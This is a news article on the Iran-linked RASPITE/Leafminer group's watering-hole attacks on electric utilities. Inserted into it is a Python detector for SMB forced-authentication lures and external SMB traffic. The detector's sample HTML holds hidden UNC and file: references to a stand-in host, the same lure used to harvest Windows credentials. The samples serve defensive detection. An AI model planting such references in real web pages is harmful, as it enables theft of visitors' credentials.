Iran-Linked Actor Targets U.S. Electric Utility Firms

Likely operating out of Iran, the Leafminer cyber-espionage group has been targeting entities in the United States, Europe, Middle East, and East Asia, industrial cybersecurity firm Dragos warns.

The group was previously said to have been targeting government and other types of organizations in the Middle East since at least early 2017, but it appears that its target list is much broader.

Dragos, which calls the actor RASPITE, says the entity has been targeting industrial control systems in numerous countries, including access operations in the electric utility sector in the United States.

Initial access to target networks is obtained through strategic website compromise (also known as watering hole attacks), the security firm says. Similar to the DYMALLOY and ALLANITE threat actors, the group embeds in the compromised site a link to an external resource that prompts the visitor's machine to open an SMB connection, through which Windows (NTLM) credentials are harvested.
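The forced-authentication trick described above leaves two artifacts a defender can look for: a page element whose source points at a UNC path, file: or smb: URL, and an outbound SMB connection from a workstation to an address outside the organization. The following is an added example, not code from Dragos, Symantec or the article; the HTML and flow-log lines are constructed, the log format is assumed, and the list of "internal" prefixes is an assumption about the organization's address space.

```python
"""Spot watering-hole SMB credential-harvesting artifacts (added example)."""
import ipaddress
import re

# Element references that Windows may resolve over SMB rather than HTTP,
# causing the client to authenticate (NTLM) to the named host.
# The attribute list is an assumption; real pages may use other vectors.
_FORCED_AUTH_REF = re.compile(
    r'\b(?:src|href|data|background)\s*=\s*["\']?'
    r'((?:file:|smb:|\\\\)[^"\'\s>]+)',
    re.IGNORECASE,
)

# Address space treated as internal. Listed explicitly because Python's
# ipaddress.is_private also covers the RFC 5737 documentation ranges used
# in the sample data, which would hide the hits below.
_INTERNAL_NETS = [
    ipaddress.ip_network(n)
    for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16",
              "127.0.0.0/8", "169.254.0.0/16")
]

_SMB_PORTS = {445, 139}

# Assumed flow-log line shape: "<ts> src=<ip> dst=<ip> dport=<n> proto=tcp"
_FLOW = re.compile(r"src=(\S+)\s+dst=(\S+)\s+dport=(\d+)")


def find_forced_auth_refs(html: str) -> list[str]:
    """Return element references in *html* that would trigger SMB access."""
    return [m.group(1) for m in _FORCED_AUTH_REF.finditer(html)]


def is_internal(ip: str) -> bool:
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in _INTERNAL_NETS)


def flag_external_smb(flow_lines: list[str]) -> list[tuple[str, str, int]]:
    """Return (src, dst, dport) for SMB-port flows leaving the internal space."""
    hits = []
    for line in flow_lines:
        m = _FLOW.search(line)
        if not m:
            continue
        src, dst, dport = m.group(1), m.group(2), int(m.group(3))
        if dport in _SMB_PORTS and not is_internal(dst):
            hits.append((src, dst, dport))
    return hits


# Constructed sample page: one benign image, one 1x1 image fetched over a
# UNC path and one stylesheet fetched over file:.
SAMPLE_HTML = """<html><body>
<img src="https://cdn.example.com/logo.png">
<img src="\\\\203.0.113.7\\share\\pixel.png" width="1" height="1">
<link rel="stylesheet" href="file://203.0.113.7/s/style.css">
</body></html>"""

# Constructed sample flows: internal SMB, external SMB, external HTTPS,
# external NetBIOS session.
SAMPLE_FLOWS = [
    "2018-08-02T14:01:10Z src=10.20.30.41 dst=10.20.30.5 dport=445 proto=tcp",
    "2018-08-02T14:01:12Z src=10.20.30.41 dst=203.0.113.7 dport=445 proto=tcp",
    "2018-08-02T14:01:13Z src=10.20.30.41 dst=203.0.113.7 dport=443 proto=tcp",
    "2018-08-02T14:02:40Z src=10.20.30.77 dst=198.51.100.9 dport=139 proto=tcp",
]

if __name__ == "__main__":
    for ref in find_forced_auth_refs(SAMPLE_HTML):
        print("forced-auth reference:", ref)
    for src, dst, port in flag_external_smb(SAMPLE_FLOWS):
        print(f"external SMB: {src} -> {dst}:{port}")
```

The page scan is a cheap check to run against a cached copy of any site an ICS vendor or utility staff are known to visit; the flow check is the network-side confirmation, and in most environments any TCP/445 or TCP/139 session to a non-internal address is worth blocking at the perimeter outright.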

Next, the actor deploys scripts to install a malicious service that connects to RASPITE-controlled infrastructure and provides remote access to the victim machine.

Although it has focused on ICS-operating entities, RASPITE has yet to demonstrate an ICS-specific capability. At the moment, there is no indication that the actor can launch destructive ICS attacks such as those behind the widespread blackouts in Ukraine.

In a report on the group last week, Symantec revealed that both custom-built malware and publicly-available tools were leveraged in observed campaigns, including a modified version of Mimikatz. Some of the tools were linked to other groups apparently tied to Iran, Symantec said, noting that the actor appears to be inspired by the Russia-linked Dragonfly group.

“Dragos caught RASPITE early in its maturity, which is ideal as it allows us to track its behavior and threat progression to help organizations defend against them. RASPITE uses common techniques, which is good because defenders with sufficient monitoring can catch them and mitigate any opportunity for them to get better,” Sergio Caltagirone, Director of Threat Intelligence, Dragos, said.

“At this time we are limiting the amount of information in our public reports to avoid the proliferation of ideas or tradecraft to other activity groups,” Caltagirone continued.

Related: Iran-Linked ‘Leafminer’ Espionage Campaign Targets Middle East

Related: ‘Allanite’ Group Targets ICS Networks at Electric Utilities in US, UK

Written By

Ionut Arghire is an international correspondent for SecurityWeek.
